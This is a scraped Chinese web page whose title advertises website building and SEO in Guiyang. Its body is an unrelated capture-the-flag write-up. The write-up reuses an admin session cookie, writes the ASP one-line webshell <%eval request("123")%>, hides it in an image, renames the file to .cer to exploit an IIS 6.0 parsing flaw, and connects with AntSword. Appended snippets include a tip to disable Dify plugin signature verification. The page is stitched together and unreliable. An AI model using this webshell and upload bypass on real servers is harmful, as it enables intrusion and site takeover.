贵阳市网站建设_网站建设公司_网站建设_seo优化

首页 / 建站日记 / 贵阳市网站建设_网站建设公司_网站建设_seo优化
贵阳市网站建设_网站建设公司_网站建设_seo优化
2025/12/30 10:41:07 网站建设 项目流程

"F12"-->"application"添加第三章获取的cookie:
name:ADMINSESSIONIDCSTRCSDQ
value:LBMLMBCCNPFINOANFGLPCFBC
点击"准备好了吗",进入后台管理界面。
image
查找上传webshell点:"产品管理"-->修改产品
生成一句话木马文件test.asp,文件内容为:<%eval request("123")%>
生成图片马:准备好一张任意图片和一句话木马文件。
image
将生成的111.png图片马修改后缀名为111.cer上传到产品管理中【因为jpg文件不解析,所以服务器会当做一张图片去读取,而不是代码】
上传png后缀中报错信息里面写了iis6.0的中间件。iis解析漏洞:上传cer文件,iis6.0会解且执行。
image
连接蚁剑:
image
image
拿到FLAG:zkz{G3t_the_admin!Sh3ll}

标签: 网站建设 企业官网 项目流程 UI设计 前端开发

热门文章

文章分类

标签云

网站建设 响应式设计 用户体验 SEO优化 前端开发 小程序 电商平台 性能优化

相关文章

您可能感兴趣的其他内容

dify插件打包后上传安装报错:plugin verification has been enabled, and the plugin you want to install has a bad
2025/12/30 10:41:07 网站建设

dify插件打包后上传安装报错:plugin verification has been enabled, and the plugin you want to install has a bad

在 .env 配置文件将 FORCE_VERIFYING_SIGNATURE 改为 false ,Dify 平台将允许安装所有未在 Dify Marketplace 上架(审核)的插件。services:api:image: langgenius/dify-api:1.10.1restart: alwaysenvironment:<&…...

阅读更多 →
覆盖机场、咖啡馆与会议室!2025 全自动咖啡机靠谱厂家,值得信赖品牌清单 - 品牌2026
2025/12/30 10:41:07 网站建设

覆盖机场、咖啡馆与会议室!2025 全自动咖啡机靠谱厂家,值得信赖品牌清单 - 品牌2026

覆盖机场、咖啡馆与会议室!2025 全自动咖啡机靠谱厂家,值得信赖品牌清单 在筹划开设咖啡连锁、精品咖啡馆、便利店,或是为高端酒店、企业办公室配备专业咖啡设备时,寻找一个全自动咖啡机靠谱厂家和值得信赖的品牌是…...

阅读更多 →
5大理由告诉你为什么Java开发者应该选择Playwright自动化测试
2025/12/30 10:40:34 网站建设

5大理由告诉你为什么Java开发者应该选择Playwright自动化测试

5大理由告诉你为什么Java开发者应该选择Playwright自动化测试 【免费下载链接】playwright-java Java version of the Playwright testing and automation library 项目地址: https://gitcode.com/gh_mirrors/pl/playwright-java 还在为浏览器兼容性测试烦恼吗&#xff…...

阅读更多 →

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询